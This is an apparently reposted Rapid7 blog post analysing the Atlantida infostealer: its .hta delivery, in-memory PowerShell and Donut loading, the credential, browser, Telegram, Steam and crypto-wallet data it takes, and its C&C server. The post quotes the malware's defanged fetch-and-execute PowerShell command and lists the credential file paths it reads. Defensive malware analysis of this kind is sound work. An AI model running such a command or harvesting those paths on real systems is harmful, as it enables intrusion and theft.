Rapid 7 - Whispers of Atlantida: Safeguarding Your Digital Treasure

Whispers of Atlantida: Safeguarding Your Digital Treasure

Recently, Rapid7 observed a new stealer named Atlantida. The stealer tricks users to download a malicious file from a compromised website, and uses several evasion techniques such as reflective loading and injection before the stealer is loaded.

Atlantida steals a wide range of login information of softwares like Telegram, Steam, several offline cryptocurrency wallets data, browser stored data as well as cryptocurrency wallets browser extension data. It also captures the victim's screen and collects hardware data.

Whispers of Atlantida: Safeguarding Your Digital Treasure

Technical Analysis

Stage 1 - Delivery

The attack starts with a user downloading a malicious .hta file from a compromised website. It is worth mentioning that the .hta file is manually executed by the victim. When investigating the file, we observed a Visual Basic Script that decrypts a hardcoded base64 string and executes the decrypted content:

Whispers of Atlantida: Safeguarding Your Digital Treasure

The decrypted command : “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm hxxp://166.1.160[.]10/loader.txt | iex“ .

Stage 2 - Three levels of in-memory loading

The executed PowerShell command downloads and executes a next stage PowerShell script in memory.

Whispers of Atlantida: Safeguarding Your Digital Treasure

The PowerShell script downloads and reflectively loads a .NET downloader. The .NET downloader is a simple downloader that calls DownloadData API function to get a Donut injector. Donut is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and .NET assemblies. Next, the Donut is injected to newly created “C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe” by using a Remote Thread Injection Technique (aka CreateRemoteThread). This technique works by writing a shellcode into the context of another eligible process and creating a thread for that process to run the payload.

Whispers of Atlantida: Safeguarding Your Digital Treasure
Figure 4 - .Net downloader Main function

Stage 3 - Atlantida Stealer

The Donut injector is used to load a final payload, which in our case is a new Atlantida Stealer. It got its name following the string found in the executable.

Whispers of Atlantida: Safeguarding Your Digital Treasure

First, the Atlantida stealer captures the entire screen by using the combination of GetDC, CreateCompatibleDC,CreateDIBSection, SelectObject and BitBlt API function combination. Next, it checks if a Filezilla (open source FTP software, that allows users to transfer files from a local to a remote computer) recent services file exists. It does that by attempting to open “C:\Users\username\AppData\Roaming\FileZilla\recentservers.xml” if it does, it reads the file. Next, it looks for the following offline cryptocurrency wallets by enumerating the files under the wallet path:

Whispers of Atlantida: Safeguarding Your Digital Treasure

The stealer reads all the files found under the enumerated path.

Next, it collects the victim's hardware data such as RAM, GPU, CPU and screen resolution. The stealer enumerates the user's Desktop folder and reads all text files(.txt). It also looks for Binance wallet credentials by enumerating a `C:\Users\Username\AppData\Roaming\Binance` directory and reading all JSON files under it.

Steam (video game digital distribution service) configuration and credentials are also in Atlantida stealer’s interest as we observed it enumerating the Steam configuration directory and searches for the following files:

  1. Ssfn - Steam Sentry File.
  2. Config.vdf - Stream configuration file.
  3. Loginusers.vdf - stores the records of previously logged-in Steam accounts.
Whispers of Atlantida: Safeguarding Your Digital Treasure
Figure 6 - Steam files enumeration

The last thing that Atlantida is harvesting is Telegram data. It collects all the data located in “C:\Users\Username\AppData\Roaming\Telegram Desktop\tdata”.

The stealer now connects to the hard coded C&C server (45.144.232.99). We accessed the hardcoded IP and got to the login page of what we assume is a stealers control panel, which also had an `Atlantida` title.

Whispers of Atlantida: Safeguarding Your Digital Treasure
Figure 7 - Atlantida login page


No data is passed to the C&C server this time and the stealer continues its collection. Differently from other stealers, Atlantida focuses only on three web browsers: Google Chrome, Mozilla Firefox and Microsoft Edge. It steals all stored passwords, cookies, tokens, credit cards and autofills.

One of the notable functions of Atlantida stealer is its ability to steal data from Chrome-based browser extensions. For each Chrome-based extension, an “Extension ID” is given. The malware uses this information to harvest data stored within. Atlantida harvests data from the following cryptocurrency wallets extensions:

Whispers of Atlantida: Safeguarding Your Digital Treasure
Whispers of Atlantida: Safeguarding Your Digital Treasure
Whispers of Atlantida: Safeguarding Your Digital Treasure

When the stealer finishes the collection, all data is compressed and sent to the C&C server. Then the malware exists.

Rapid7 Customers

For Rapid7 MDR and InsightIDR customers, the following Attacker Behavior Analytics (ABA) rules are currently deployed and alerting on the activity described in this blog:

  • Suspicious Process - MSHTA Spawns PowerShell

MITRE ATT&CK Techniques:

Whispers of Atlantida: Safeguarding Your Digital Treasure
Whispers of Atlantida: Safeguarding Your Digital Treasure

IOCs

Whispers of Atlantida: Safeguarding Your Digital Treasure


from Rapid7 Cybersecurity Blog https://blog.rapid7.com/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/

Comments

Popular posts from this blog

Krebs - NY Charges First American Financial for Massive Data Leak

KnowBe4 - Scam Of The Week: "When Users Add Their Names to a Wall of Shame"